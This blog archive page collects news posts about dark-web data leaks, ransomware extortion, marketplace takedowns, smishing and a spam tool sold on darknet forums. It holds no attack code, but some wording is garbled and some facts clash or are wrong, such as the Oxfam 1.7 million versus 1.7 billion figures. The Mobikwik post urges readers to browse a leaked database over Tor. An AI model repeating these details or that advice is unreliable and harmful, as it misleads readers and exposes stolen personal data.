Search This Blog

Showing posts with label Dark Web. Show all posts

Domino’s Data Leak Exposed Data of 18 Crore Orders

 

The famous Pizza company Dominos suffered a data leak again this year wherein the details of 18 crore orders are made accessible on the dark web, according to some security experts. 

A hacker alleged that earlier in April he had successfully gained access to Dominos data in the value of 13TB. Data belonging to more than 180,00,000 purchase orders containing telephone numbers, e-mail addresses, and billing information, and user credit card details would be included in the leak. 

Domino's Pizza, Inc. is a multinational American pizza restaurant chain established in 1960, known as Domino's. The F&B chain is particularly prominent in India, which can be seen in the smooth functioning of its operations despite the ongoing pandemic. 

Rajshekhar Rajaharia, a security expert, took to Twitter to announce that Dominos was again infringed upon while showing that 18 crore orders' data was made available as hackers built a search engine on the Dark Web; customers will most probably find their personal information there if they are regular dominos buyers. The information leaked comprises users' name, e-mail, telephone number, and even their GPS locations. 

"Data of 18 crore orders of Domino's India have become public. Hacker created a search engine on Dark Web. If you have ever ordered @dominos_india online, your data might be leaked. Data include Name, Email, Mobile, GPS Location, etc," Rajaharia tweeted. 

The incident was brought to light before the beginning of April by Alon Gal, CTO of cybersecurity company Hudson Rock. He said that users' data were sold for about ten BTC by hackers. The hackers want to create a search engine to enable data to be queried, Gal further added. 

The data compromised include 10 Lakh credit card details and even addresses of people who have purchased Dominos Pizza. However, Dominos India had denied leakage of financial information of users in a declaration given to Gadgets 360. 

When Jubilant Food Works, the master franchise holder for Domino's in India, Nepal, Sri Lanka, and Bangladesh, was approached, it was confirmed that the company recently had a security incident but no financial details were revealed. 

"Jubilant Food Works experienced an information security incident recently. No data about financial information of any person was accessed and the incident has not resulted in any operational or business impact.” 

"As a policy, we do not store financial details or credit card data of our customers, thus no such information has been compromised. Our team of experts is investigating the matter and we have taken necessary actions to contain the incident," the company spokesperson said.

Leaked Apple Schematics & Extortion Threats Removed From Dark Web

 

According to MacRumors, the ransomware group that stole schematics from Apple supplier Quanta Computer last week and threatened to release the trove of documents has mysteriously deleted all references to the extortion attempt from its dark web blog. 

Last Tuesday, the ransomware group REvil claimed that it had gained access to Quanta's internal computers and obtained some photographs and schematics of unreleased Apple products. The group requested $50 million from Quanta in order to retrieve the data. However, according to a statement posted on the hacker group's website on April 20, Quanta declined to pay the ransom, which led the criminals to turn their attention to Apple. 

The hackers publicly posted a handful of images depicting unreleased product schematics, including in total, 21 images showing different features of an alleged upcoming MacBook Pro, an SD card slot, HDMI slot, and a MagSafe charger, to prove they had hacked into Quanta's servers and to increase the pressure on Apple. 

Unless Apple paid the $50 million ransom demand in return for removing the files, the group threatened to publish new data every day leading up to May 1. The extortion attempt was timed to coincide with Apple's "Spring Loaded" digital event on April 20, at which the company unveiled AirTag item trackers, new iPad Pro models, and new iMacs. Despite the threat, after the original demand was made public, no further stolen documents have been leaked online. 

REvil isn't known for bluffing and regularly shares stolen documents if its victims don't pay up, so it's unclear why the group didn't follow through this time. According to MacRumors, the photos were mysteriously deleted from their dark web location. The group has not stated why the photos were deleted, and all references to the blackmail attempt have been removed. 

Apple is still yet to comment on the breach, although it has a history of refusing to deal with hackers. A hacker group tried to extort money from Apple in 2017 by keeping consumer data hostage. "We do not reward cybercriminals for violating the law," Apple told the community, and the company has yet to comment on the breach. 

The group is still aggressively extorting other businesses, so it's unclear what caused it to delete all material related to the Quanta hack.

SOCTA: Here's a Quick Look into the Report by Europol

 

The Serious Organized Crime Threat Assessment study 2021 by Europol summarises the criminal threat from the last four years and offers insights into what can be expected in the following four years. Organized crime isn't just cybercrime, but cybercrime is now a big component of organized crime. Europol sees the development of businesses, growth in the digital lifestyle, and the rise of remote workers as new vulnerabilities and opportunities for use. 

“Critical infrastructures will continue to be targeted by cybercriminals in the coming years, which poses significant risks,” cautions the published report. “Developments such as the expansion of the Internet of Things (IoT), the increased use of artificial intelligence (AI), applications for biometrics data, or the availability of autonomous vehicles will have a significant impact. These innovations will create criminal opportunities.” 

The interruption of Emotet Botnet in January 2021, with foreign activities organized by Europol, is highlighted in the report. This includes the international efforts concerning the authorities of the Netherlands, Germany, the United States, the United Kingdom, France, Lithuania, Canada, and Ukraine. But the overall thought is that cybercrime is growing in sophisticated ways with criminal gangs being increasingly organized due to which the threat is multiplying at a fast rate. However, the Europol report does not comment on the usual cyber threats, apart from the fact that crime syndicates sell it 'as a service more and more. 

ENISA estimates that 230,000 new malware variants are detected each day. Europol shows that the number and sophistication of attacks continue to increase. “The increase in the number of attacks on public institutions and large companies is particularly notable.” Further, the DDoS - Denial of service is an expanding threat, frequently followed by attempts at extortion. Attacks on government and vital resources continue, but criminal groups with lower security protocols increasingly target smaller organizations. 

“Last year saw a multitude of damaging consequences from ransomware, breaches, and targeted attacks against sensitive data,” comments Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber. Cyber attackers have taken full advantage of the much more critical vulnerabilities at the detriment of the organizations, ranging from hacks of COVID-19 study data to assaults on critical networks and government agencies. The increase in online child exploits, especially what is recognized as the live distance violence, also occurred as students experienced months at home during school closures. Besides, Europol states that it has a database of over 40 million pictures from around the globe of child sexual abuse. 

Furthermore, there shouldn’t be an underestimation of the involvement of the Dark Web in illegal activities, where criminals use it to share their knowledge on operating security. The usage of the dark web for the selling of illicit drugs and weapons has increased over the past four years, but law enforcement has seemed to have caused some mistrust among consumers and might have cooled down the growth rate in association with online assaults. Sex trafficking (THB) is also carried out on the dark web and surface web pages where labor and sex are the main categories. Europol claims that THB is substantially underreported and states that in the EU, THB is on the rise for labor exploitation. 

Even the complexity of technology has increased with the inception of fraud such as investment fraud, BEC, non-deployment fraud, novelty fraud, fake invoice fraud, social profit fraud, bank fraud, etc. This will probably go on. Also “The use of deep fakes will make it much more challenging to identify and counter fraud,” warns Europol. And the organized crime ecosystem is marked by a networked environment with smooth, systemic, and profitable coordination among criminals.

OTP Generating Firm at a Risk, as Hacker Claims to have Sold its Sensitive Data

 

A hacker seems to sell confidential information that is claimed to have been robbed from an OTP firm. And this OTP firm perhaps has some of the most prominent technology and business giants on its customer's board list which includes Google, Facebook, Amazon, Emirates, Apple, Microsoft, Signal, Telegram, and Twitter, etc. 

A one-time password ( OTP ), also called a one-time pin or dynamic password is a legitimate password on something like a computer system, or even on a digital device, for a single login or transaction. Besides, the very same hacker claims to also have real-time access to the company's OTP device. The InfoSec researcher, Rajshekar Rajaharia, however, didn’t agree with the hacker behind the identification of such a suspected breach. 

“The seller was active on the dark web forum for a long time claiming to sell live access to OTP and 2FA but from what we have seen there are some chances that the data might be old as we have found some clues that changes have been made with dates. Nevertheless, we are still investigating because data seems real otherwise,” stated Rajaharia. 

Rajaharia also provided sample information with confirmation of the presence of one-time codes and even if not all of them are currently available or legitimate, a purchaser might find valuable work throughout the platform and its policies. It offered 50GB of exfiltrated data, among several other details. The cost of access was reduced from $18,000 to $5,000 for the introductory mark. Though the name of the company is listed in the listing, for security purposes it is considered unethical to disclose it. 

Other details included in the selling package are PII, including SMS logs, mobile numbers, e-mail addresses, SMPP details, customer documentation, and much more. Since 2017, the data itself is comprehensive. The seller switched the listing from the dark web marketplace to Telegram, as per the latest revelation, where sales were continued, however, the number of buyers was unknown. Also, 10 million OTPs appear in the data packs. 

The company in conversation refused all data infringement charges by claiming that perhaps the systems were as stable as ever and it could not verify the authenticity of the alleged data. 

Also, the National Stock Exchange of India received a letter from them, which reads, “We would like to highlight that unverified posts and claims are being circulated about an alleged data breach at [company’s name retracted]. Based on the evidence we have seen thus far, it is not from any of our current systems, and therefore we cannot verify the authenticity of the alleged data breach.” 

However, the company stated that they were engaged with an expert in a third party to support them in its system audit, so it would be noticed and uprooted if there was a web shell in there.

533 Million Facebook Users' Phone Numbers And Personal Data Leaked Online

 

On Saturday, a user turned to a low-level hacking forum to leak the personal information of hundreds of millions of Facebook users, free of cost. The sensitive credentials that have been exploited included personal data of over 533 million Facebook users from 106 countries – around 32 million users from the US, 11 million from the UK, and around 6 million from India. Leaked data includes users’ full names, their date of birth, address location, phone numbers, Facebook IDs, bios, and in certain instances email addresses also. 

Alon Gal, a CTO of cybercrime intelligence firm Hudson Rock, analyzed the breach on Saturday and informed about this event on Twitter. Alon Gal is also known for his last research finding that was appeared as the same leaked database previously became accessible via a Telegram bot in January. 

While back then, the situation was different. The hacker who was behind the Telegram bot leaked database was selling the hacked credentials to those clients who were ready to pay for the information, but this time the difference is that that all this leaked data of more than 533 million people is available for everyone for free in a low-level hacking forum. 

“A database of that size containing the private information such as phone numbers of a lot of Facebook’s users would certainly lead to bad actors taking advantage of the data to perform social engineering attacks [or] hacking attempts,” Alon Gal stated. 

The incident is not foreign to Facebook, which is indeed a popular platform in the arena of cyberattacks. Before this cyberattack, the platform had already experienced data breaches multiple times, notably so. 

The vulnerability that had been spotted in 2019 exposed sensitive information of millions of Facebook users including their phone numbers to be scraped from Facebook's servers in contravention of its terms of service. Back then, Facebook officially stated that the vulnerability was patched in August 2019. Additionally, Facebook vowed to eliminate mass data-scraping after Cambridge Analytica scraped over 80 million users’ data in violation of Facebook's terms of service to target voters with political ads in the 2016 election.

Hacker Hacks Underground Covid Vaccine Market On Dark Web

 

In a recent cybersecurity incident, an attacker hacked down a vaccine marketplace that was running on the dark web. The attacker then placed fake orders, cancelled them after making a refund in Bitcoins worth $752,000, a report released on Thursday says.  As per a blog on the market's forum, the attacker managed to find a way to make fake orders, which he cancelled immediately using the seller account of the trader, and immediately made the refunds in the wild, which was withdrawn in an instant. 

Checkpoint research says the method allowed a hacker to make 13 Bitcoins (BTC), an amount equal to $752,000. Currently, the vaccine marketplace on the dark web which was selling these products is down because of the hack.  But, the attack hasn't put a stop to the sale of Covid-19 relief products on the dark internet. Following the marketplace shutdown, another hacking forum was framed using the same address, offering various ads along with Covid-19 vaccines (documents included) and that too on heavy discounts for promotional purposes.  

Cybersecurity experts recently found out that fake Covid-19 vaccine certificates and duplicate Covid-19 test results were being sold on dark internet and hacking platforms for amount as low as Rs 1800 ($25) and up to Rs 18,000 ($250) for people that are looking to book flights, travel across borders, finding a new job or attending a function.  If an interested user wants to get these 'fake certificates,' he can simply obtain them by sending their details and money to the seller on the dark web, the seller will then e-mails back the forged documents for $250. 

Research from Checkpoint revealed that fake negative Covid-19 test results are available on the dark web for a mere amount of $25.  Covid-19 vaccine ads on the darknet have had a 3 fold increase since the last three months. The selling forums on the dark internet are based from European countries like Spain, Russia, France, and Germany. According to experts, "The vaccines advertised include Oxford-AstraZeneca (at $500), Johnson & Johnson ($600), the Russian Sputnik vaccine ($600) and the Chinese SINOPHARM vaccine." Checkpoint research says, "as a result, the marketplace is down completely since, and at this point of time is yet to be restored online."

Here's How to Safeguard Against Mobikwik Data Breach

 

Cybersecurity researchers claimed that the KYC data of as many as 11 crores Mobikwik users had been leaked and put up for sale on the dark web. However, the Gurugram-based digital wallet company is denying the data breach by stating that they have not discovered any evidence of a data leak.

Rajshekhar Rajaharia, an independent cyber-security researcher was the first person who disclosed the data leak in February. He had said that bank details, email addresses, and other sensitive details of nearly 11 crore Indians were leaked on the dark web. 

Approximately, 8 terabytes (TB) of personal user information were stolen from Mobikwik’s main server by a hacker named ‘Jordan Daven’ and put on dark web platforms on January 20, Rajaharia stated. As a shred of evidence, Jordan Devan emailed the link of the stolen database to PTI and stated that they do not have any other motive of using the data except to acquire it from the company and delete it from their end and also shared the private details of Mobikwik founder Bipin Preet Singh and CEO Upasana Taku from the stolen database. 

When approached, Mobikwik denied the claims and stated, “the company is subjected to stringent compliance measures under its PCI-DSS and ISO Certifications which includes annual security audits and quarterly penetration tests to ensure the security of its platform. As soon this matter was reported, the company undertook a thorough investigation with the help of external security experts and did not find any evidence of breach.” 

Precautionary measures for Mobikwik users 

To check out whether your data is compromised or not, you have to download the Tor browser. It is a free and open-source web that helps you anonymously browse the web. You should also update your Mobikwik account by setting new passwords and setting up two-factor authentication. 

Open this link to access the entire database of the leak that is now online. Search for your data by using your email id or contact number. If nothing pops up, you are safe but if something does pop up then you should immediately contact your bank, and block your cards now.

Threat Actor Targets Guns.com, Spills Sensitive Information on Dark Web

 

As the domain name suggests, Guns.com is a major Minnesota, US-based platform to buy and sell guns online. It is also home to news and updates for firearm owners and lovers around the globe. However, on March 9th, 2021, a database seemingly belonging to Guns.com was dumped on the popular dark web site ‘Raid Forums’.

Earlier this week, a large cache of files allegedly stolen from Guns.com also appeared on Raid Forums. The hackers behind this data dump claimed that files contain a complete database of Guns.com along with its source code. They further added that the breach took place somewhere around the end of 2020 and the data was sold privately meaning on Telegram channels or dark web forums.

According to the analysis of Hackread.com, data dump contains substantial gun buyer information including user IDs, full names, nearly 400,000 email addresses, password hashes, physical addresses, zip codes, city, state, magneto IDs, contact numbers, and account creation date.

One of the folders in the leaked database includes customers’ bank account details including full name, bank name, account type, and dwolla IDs. However, credit card numbers or VCC numbers were not leaked. 

The data dump also contains Guns.com login credentials, an Excel file in the database seems to be containing sensitive login details of Guns.com including its administrator’s WordPress, MYSQL, and Cloud (Azure) credentials. However, it is unclear whether these credentials are recent, old, or already changed by the site’s administrators amid the breach.

This can have a devastating effect on the company since all admin credentials including admin emails, passwords, login links, and server addresses are in plain text format. With this kind of sensitive information available from this hack, a skilled hacker could commit several identity fraud schemes, be well equipped to target victims with phishing scams or other malicious activities.

Insider Trading Threats on Dark Web

 

Insider trading can be done more effectively now than ever before, due to a great extent to the continuing proliferation of encrypted and anonymous messaging services, and the presence of dark web and underground networks that permit threat actors to discover co-conspirators and speak with them. Verifiably, few dark web forums catered to the trafficking of non-public corporate data; presently, updated technology takes into account these endeavors to be conducted with a lot more prominent operational security. 

Monetarily inspired threat actors or displeased employees would now be able to trade data away from the prying eyes of law enforcement and security researchers, permitting only vetted individuals to access sensitive information being given by insiders. 

Moreover, the clearnet is host to many market trading enthusiast groups, on places like Reddit and Discord. These groups range in size from thousands to millions of clients. Insikt Group found "stock signals" services, giving paid clients tips on which trades to make dependent on the proposal of “analysts”. Given that the root of the data is muddled, the unregulated nature of these services and the utilization of unknown messaging services is concerning. 

One of the verifiably significant sites had been The Stock Insiders, a Tor-based site, active from April 2016 until August 2018. As the name proposes, the site was made with the goal of having a community of clients with insider access at publicly traded companies who would impart it to different clients to advise the stock trades of the larger group. The site has for quite some time been inactive, the administrator isn't responsive to private messages, and there have not been any updates to the main page since early 2018. The explanation that operations stopped has not been clarified however it doesn't seem, by all accounts, to be the consequence of a law enforcement takedown since the website is still technically up. 

While the site is no longer active, it actually gives an instructive perspective on how its operations were done. The Stock Insiders has a couple of visible posts instructing clients about how to enlist an account and listing out the requirements for full membership.

What are Smishing Attacks? How to Prevent Them?

 

Smishing is a cyber assault that utilizes SMS text messages to delude its victims into giving sensitive data to a cybercriminal. Sensitive data incorporates your account name and password, name, banking account, or credit card numbers. The cybercriminal may likewise implant a short URL link into the text message, inviting the client to tap on the link which in most cases is a redirect to a pernicious site. Smishing is identified with two other 'smishing' cyber assaults, phishing and vishing. 

Cybercriminals today are essentially inspired by monetary benefit. They create code intended to obfuscate your sensitive data for benefit. At the point when they acquire this information, they may hope to sell your compromised credit card or credentials on the dark web. They may likewise utilize sensitive information to open an account in your name or hold your information ransom in exchange for a large pay-out. 

Back in May 2018, Fifth Third Bank clients were the targets of a smishing assault. The assailants claimed to represent Fifth Third Bank. They contrived a plan to caution clients that their accounts were locked. Within the body of the text message, they gave a link to the clients to open their accounts. The link took the clueless client to a phony webpage that seemed to be like Fifth Third's genuine site. The phishing site prompted the visitors to enter their user name and password, one-time code, and PIN codes to open their account. The cybercriminals then utilized the stolen account data to expunge almost $68,000 from 17 ATMs across three states. 

Some of the ways to prevent smishing attacks are: 

• Try not to react to text messages that demand private or monetary data from you. 

• On the off chance that you get a message that has all the earmarks of being from your bank, financial institution, or other entity that you work with, contact that business directly to decide whether they sent you a genuine solicitation. Review this entity’s policy on sending text messages to clients. 

• On the off chance that a text message is encouraging you to act or react rapidly, pause and consider the big picture. Recall that crooks utilize this as a strategy to get you to do what they need. 

• Never reply to a dubious text message without doing your research and checking the source.

WeLeakInfo's Customer Records Leaked

 

WeLeakInfo.com was an information breach notification service that was permitting its clients to check if their credentials have been compromised in information breaches. The service was guaranteeing a database of more than 12 billion records from over 10,000 data breaches. In mid-2020, a joint operation directed by the FBI in coordination with the UK NCA, the Netherlands National uPolice Corps, the German Bundeskriminalamt, and the Police Service of Northern Ireland resulted in the seizure of the WeLeakInfo.com domain. 

The U.S. Department of Justice in January declared that it seized weleakinfo.com, which existed since 2017. The site sold different subscription levels, making it workable for scammers to access and look through the database. Two 22-year old men,, one in the Netherlands and the other in Northern Ireland, were arrested in connection with running the site, as per the Dutch media source Nu.nl. 

The site additionally vowed to alert members if their own data was stolen and uploaded to the database, with a feature called “Asset Monitoring.” “Get notified when your information is detected in a data breach,” the sales pitch said, according to an archived version of the homepage. “Stay one step ahead of hackers.” 

Weleakinfo, and other sites like it, basically work as a noxious variant of HaveIBeenPwned, a database where guests can check if their data has been compromised. HaveIBeenPwned permits clients to decide whether an email address has been included for different information breaches. 

Security specialists from Cyble saw that a member from a hacking forum professed to have registered in one of the domains of WeLeakInfo,, wli.design, which was enlisted again on March 11 2021. At that point, the actor made an email address for the domain and utilized it to get to the account of the cybercrime group registered on the payment service Stripe. The admittance to the Stripe account permitted the actor to get to clients' details, including email, address, partial card details, and purchase history. 

“The WeLeakInfo operators allegedly used the domain’s email address for payments via Stripe, the actor claimed. The actor claimed to have registered the domain and then created an email address on the registered domain used in their Stripe account gaining access to WeLeakInfo customers details.” reads the post published by Cyble.

Bug in Brave Browser Expose Users’ Dark Web History

 

Brave, the web browser that insists on privacy, exposes users' activities to its Internet Service Providers on Tor's secret servers, or "dark web." In its browser, Brave has solved a data protection problem that sends queries for .onion domains to a DNS solution, instead of a Tor node path, so that access to the dark website is shown to users. In a hotfix release, the bug was addressed.

Brave is an open-source web browser built on a Chromium web browser created by Brave Software, Inc. It restricts advertisements and website trackers and supplies users with a way to submit cryptocurrency donations to websites and developers of content in the form of simple tokens. 

Introduced in June 2018, Brave's Tor mode has enabled Brave users to gain anonymity when browsing the internet, encouraging them to have access to the .onion versions of legal websites such as Facebook, Wikipedia, and key news portals over the years. However, an unnamed security researcher reported in the research article, that Brave's Tor mode had sent queries to DNS resolvers rather than Tor nodes on the open Network. DNS requests are non-encrypted so that attempts to access .onion sites in Brave can be monitored using the Tor functionality, which is directly contradictory to the goal of this platform at first. 

The aforementioned DNS leak poses great dangers when all leaks build footprints on the Tor traffic of Brave users in DNS server logs. The risk is important. While in some Western states with stable democracy it might not be troublesome, it may be a concern for certain browser users to browse Brave's Tor websites from the authoritarian regimes. 

This problem seems to be the product of the browser's CNAME ad-block feature, which blocks third-party monitoring scripts using CNAME DNS for first-party scripts and prevents traffic blocker detection. This allows a website to cloak third-party scripts using primary domain's- sub-domains that are then immediately routed into a monitoring domain. 

Over the last three years, the organization has worked to develop today, second only to Tor Browser, one of the most privacy-driven Web browser solutions available. 

A Brave developer has stated after the release that the browser provided a hotfix on the problem. The problem is already solved on the night of the development of the browser. 

“Since it’s now public we’re uplifting the fix to a stable hotfix. Root cause is regression from CNAME- based adblocking which used a separate DNS query.” He further added. 

Oxfam Australia 1.7 Million users Compromise with the Data Breach

 

Recently, a hacking threat group has supposedly infected the data of 1.7 billion users, which is being investigated by Oxfam Australia – a humanitarian and non-profit organization that witnessed data breach and blatant violation of privacy. 

Oxfam Australia is a secular association which is focused on development and assistance, it is an autonomous organization that operates within the broader framework of Oxfam Umbrella to eradicate poverty across Australia, Asia, Africa, and the Middle East.

The company said in a statement on Thursday 4th of February, that they were informed about the data breach at the end of last week and that they immediately instigated an investigation to uncover the motives, origins, and damage incurred. 

Oxfam Australia is investigating a possible violation of privacy after a threat actor claimed to sell their database on a hacker website. The dark web database sample contains email addresses, names, physical addresses, telephone numbers, and donation sums, which seems to be all legit data to customers. One of the records includes legal donor data from threat actor pooled sample data. Although it is still unknown whether any data has been compromised, it was revealed earlier this week that a threat actor was trying to sell a charity database. Forensic experts were asked to help determine whether data were accessed and whether their supporters were affected. Oxfam Australia said they are currently undertaking investigations into the breach and have reported the infringements to the Australian Cyber Security Centre (ACSC) and Office of the Australian Information Commissioner (OAIC). 

"Late last week, Oxfam Australia was alerted to a suspected data incident. Oxfam immediately launched an investigation and engaged market-leading experts to assist in identifying whether data may have been accessed and any impact on its supporters." 

Chief Executive Lyn Morgain said, “Oxfam Australia had reported the matter to the Australian Cyber Security Centre (ACSC) and the Office of the Australian Information Commissioner (OAIC) while continuing to investigate the suspected incident.” 

In order to warn them of the alleged violation, Oxfam contacted supporters and stakeholders. Although no official confirmation was issued for the cyber-attack, an information violation has probably occurred based on the threat actor details. 

In these regards, all contributors and registered users on the Oxfam Australia platform need to update their passwords. They also need to change it if they use the same password on other pages. Threat actors may also use the data suspected to conduct targeted phishing attacks in that database. Both donors can watch for phishing attacks from Oxfam and submit additional personal details. 

Morgain added that “We are committed to communicating quickly to our supporters once the facts have been established, and we will provide updates as we learn more.”

E-Commerce Theft: Dark Web Card Payment Store ValidCC Shut Down


A dark web market handled by a cybercrime group, Valid CC has been hacking online merchants and stealing payment credentials for more than six years. Last week, Valid CC closed down abruptly. The owners of Valid CC say that a law enforcement operation seized their servers. The operation aimed to seize and capture the store's infrastructure. A number of online shops sell "card not present" or "CNP" payment data on the internet. The payment data may be stolen from credit cards of e-commerce stores, but it's mostly sourced from cybercriminals and threat actors.  

However, in the case of Valid CC, experts believe that the store attacked and hacked hundreds of e-commerce merchants. The hackers seeded websites with hidden card skimming codes that stole personal information and payment credentials when a customer went through the checkout stage.   Group-IB, a Russian based cybersecurity firm, had published a report last year where it briefed about the operations of Valid CC, highlighting that Valid CC was responsible for hacking around 700 e-commerce stores. Besides this, Group IB identified another group "UltraRank" responsible for attacking additional 13 third-party suppliers that offered software components to these online stores spread across Europe, America, and Asia.  

Experts believe that UltraRank orchestrated a series of cyberattacks, which were earlier attributed to three different cybercrime groups by cybersecurity firms. "Over five years….UltraRank changed its infrastructure and malicious code on numerous occasions, as a result of which cybersecurity experts would wrongly attribute its attacks to other threat actors,” said Group-IB. It adds, “UltraRank combined attacks on single targets with supply chain attacks.” Valid CC's muscle man on various platforms- a hacker who goes by the handle of SPR, notified customers that the shop would be shut down from 28 January, following a law enforcement operation that sealed Valid CC's operations. 

According to SPR, Valid CC lost access to more than 600,000 unsold payment card accounts, a very heavy blow to the store's inventory.  As a result, Valid CC lost its proxy and destination servers, and now it can't open and decrypt the back-end, says SPR.  Group-IB reports, "the store’s official representative on underground forums is a user with the nickname SPR. In many posts, SPR claims that the card data sold in the ValidCC store was obtained using JS sniffers. Most of SPR’s posts are written in English, however, SPR often switches to Russian, while communicating with customers. This might indicate that ValidCC is probably managed by a Russian speaker."  

Data Related to Thousands of Foxtons Clients Leaked Online

 

Estate agent Foxtons Group is under tremendous pressure after a daily newspaper named ‘publication i’ asserted that critical information pertaining to customers’ card and other personal details have been uploaded to a dak web site. As per the reports of publication i, on October 12 last year, a customer discovered card information, addresses, and personal messages belonging to over 16,000 individuals. 

The breached data has been linked to consumers before 2010 but what's alarming is that nearly one-fifth of the cards are still active. In most of the cases, threat actors exhibit their haul to the clients by selling a small sample online, before selling privately. The size of the personal data published online is relatively small, however, the total number of clients that have been affected remains the most intriguing question. 

Three weeks ago, Foxtons Group was notified of the published data by the client who discovered the same, however, it can be noted that the agency had not taken any measures to inform clients or the authorities yet. 

As per the reports, in the last three months, leaked files have been viewed over 15,000 times. Estate agent Foxtons Group released a statement saying that its Alexander Hall mortgage broking business was hit by malware in October 2020 during a strike that affected many other firms.

“Some IT systems were affected for several days but were restored without significant disruption to customers. All necessary disclosures have been made and full details of the attack were provided to the FCA and ICO at the time. We are satisfied that the attack did not result in the loss of any data that could be damaging to customers and believe that the ICO and FCA are satisfied with our response”, Foxtons Group stated.

The CTO of Cortex Insight, Stephen Kapp stated that “it is safe to assume the worst, and Foxton customers should look to protect themselves from identity fraud and card fraud as a result of this breach. With both personal information and payment card information lost, Foxtons customers should take some time to validate payments and potential credit history interactions since October and flag anything suspicious to their bank”.

Indian Crypto Exchange BuyUcoin Hacked

 

In yet another data breach, sensitive information of almost 3.25 lakh clients of India-based global cryptocurrency exchange and wallet, BuyUcoin, have been exposed on the Dark Web. The information leak incorporates names, emails, mobile numbers, encrypted passwords, user wallet details, order details, bank details, KYC details (PAN number, passport numbers), and deposit history. 

Established in July of 2016, BuyUcoin is a crypto wallet and trade stage where merchants and purchasers can transact with digital assets like bitcoin, ethereum, ripple, and so forth. It is based out of Delhi-NCR in India. 

As per independent cybersecurity researcher Rajshekhar Rajaharia, the 6GB document on the MongoDB database contains three backup files containing BuyUcoin information. 

"This is a serious hack as key financial, banking and KYC details have been leaked on the Dark Web," Rajaharia said and shared some screenshots of the leaked information. 

The leaked information could be utilized by attackers to run fraudulent assaults against people, the researcher said. He likewise added that the information could empower hackers to comprehend the credit score of the victims utilizing transaction details. 

Researchers at cybersecurity firm Kela Research and Strategy Ltd originally found the stolen information, connected on a similar forum, from Wongnai Media Co Ltd, Tuned Global Pvt Ltd, BuyUcoin, Wappalyzer, Teespring Inc and Bonobos.com, which looks at the craftsmanship of scandalous hacking group ShinyHunters. "Over this past summer, ShinyHunters was seen publishing leaked information for free, uncovering a large number of individual records from all over the world," Victoria Kivilevich, threat intelligence analyst at Kela Research told. 

As per Rajaharia, the hacker is the same who earlier leaked BigBasket and JusPay information in India. In November a year ago, one of India's well-known online supermarkets BigBasket found that its information of more than 20 million clients had been hacked and was on sale on the dark web for more than $40,000. Recently, Bengaluru-based digital payments gateway JusPay said that about 3.5 crore records with masked card information and card fingerprint were compromised by the hacker. 

While denying the leak, BuyUcoin CEO and Co-founder Shivam Thakral said, “We would like to reiterate the fact that only dummy data of 200 entries were impacted which was immediately recovered and secured by our automated security systems.”

AnyVan 4.1 Million Users Comprised with Data-Breach

 

Headquartered in Hammersmith, London (UK)- AnyVan is a European online platform for the patrons to access consignment, transport, and removal services from their chain network of transport partners. It focuses on European moves only. Also, it is one of the front runners of Europe in terms of moving services as it can easily compare the delivery path of the patron with that of the transport service provider and associate them to mitigate costs and eliminate CO2 emissions by optimizing storage space and haulage. However recently AnyVan affirmed its users about the unauthorized data break-in and embezzlement of personal details of its patrons by the hackers. 

The company informed its patrons by sending them a notice concerning a data breach that the company has become a victim of. AnyVan later disclosed that they discovered this incident on the 31st of December 2020 and they also mentioned the reason as to, “why they're being informed so late?” 

AnyVan in regards to the aforementioned incident stated that “This leaking of data came to our attention on the 31st December, but we understand the incident itself occurred at the end of September. As soon as the incident came to our attention, our specialist IT team investigated it and have since taken the following remedial action: all passwords have been changed."

According to the notice and statements given by the company, patrons' names, email and a cryptographic hash of their passwords have been accessed and probably displayed on the dark web by the actors. Seemingly, no other sensitive information was compromised. Further, they added that an investigation of the incident continues. however, all this came only after the actors had ample time to exploit user’s data and information. The estimate reflects that around 4.1 million users are being affected due to this data breach. AnyVan never even reached out to the ICO (Information Commissioner’s Office), which was an important step as its users' confidential data was compromised.

As a precautionary measure, the company advised its patrons to update their password and other personal details for the accounts, they use on AnyVan. They alarmed them not to share unwittingly any other piece of information or personal detail to anyone. Moreover, the company apologized for this data breach of the personal information suffered by its users and said that they are very sorry for the inconvenience caused.

DarkMarket Taken Down in an international Operation

 

DarkMarket, purportedly the world's biggest dark web marketplace, has been taken down by a Europol-coordinated international operation, as indicated by authorities. Europol upheld the takedown with specialist operational analysis and coordinated the cross-border collaborative effort of the nations.

The Central Criminal Investigation Department in the German city of Oldenburg arrested an Australian resident who is the alleged operator of DarkMarket, close to the German-Danish border over the weekend. The investigation, which was driven by the cybercrime unit of the Koblenz Public Prosecutor's Office, permitted officials to find and close the marketplace, switch off the servers and hold onto the criminal framework – over 20 servers in Moldova and Ukraine upheld by the German Federal Criminal Police Office (BKA). The stored information will give investigators new prompts to further investigate moderators, sellers, and buyers.

Before its closure, DarkMarket facilitated near 500,000 clients and had encouraged more than 320,000 transactions, as indicated by Europol. The dark web marketplace exchanged everything from drugs and counterfeit cash to stolen Mastercard details and malware. As per Europol's estimate, the site exchanged what might be compared to €140 million in today’s money, in a blend of bitcoin and monero. European authorities intend to utilize held onto DarkMarket servers from Ukraine and Moldova to investigate the buyers and dealers who utilized the site for criminal transactions.

DarkMarket's bust was not the first for German authorities, which have discovered illegal platform operators on German soil lately. In 2019, Koblenz prosecutors declared the disclosure of darknet servers facilitated from a previous NATO bunker in a lethargic German town. Authorities state the probe that revealed DarkMarket included a months-in length international law enforcement operation. US agencies like the FBI, DEA narcotics law enforcement division, and IRS tax authority all added to the investigation, alongside police from Australia, Britain, Denmark, Switzerland, Ukraine, and Moldova, with Europol playing a "coordinating role." 

DarkMarket is the most recent dark web marketplace taken down since the Silk Road bust back in 2015 — in recent years, international law enforcement operations had additionally brought down AlphaBay and Wall Street Market, which were likewise used to sell drugs and other illegal products.

Russian hackers selling program in darknet that bypasses spam protection

The Russian-language Darknet site sells a program that allows you to distribute spam messages bypassing traffic and email protection tools. The program uses a function in the IMAP protocol

A new tool for spammers is actively being sold on the Darknet, which allows you to bypass the standard protection of e-mail accounts. By exploiting a feature in the Internet Message Access Protocol (IMAP), attackers upload the messages they need directly into the mailboxes of victims.

To trigger the attack, it is necessary that the attackers already have access to the victim's account. The Email Appender malware has been actively promoted on Russian-language hacker forums since the fall of 2020.

The author offers to use the program through a subscription — $50 for one day, $300 for a week or $1000 per month. This is very expensive, but judging by the latest campaigns, the demand for this service is very high.

Experts of the information security company Vade Security indicate that companies in Italy, France, Denmark and the United States have already been subjected to full-scale attacks by spammers using Email Appender. One of the affected organizations claims that it received 300 thousand spam messages in one day and was forced to spend very substantial resources to disable compromised accounts or change usernames and passwords.

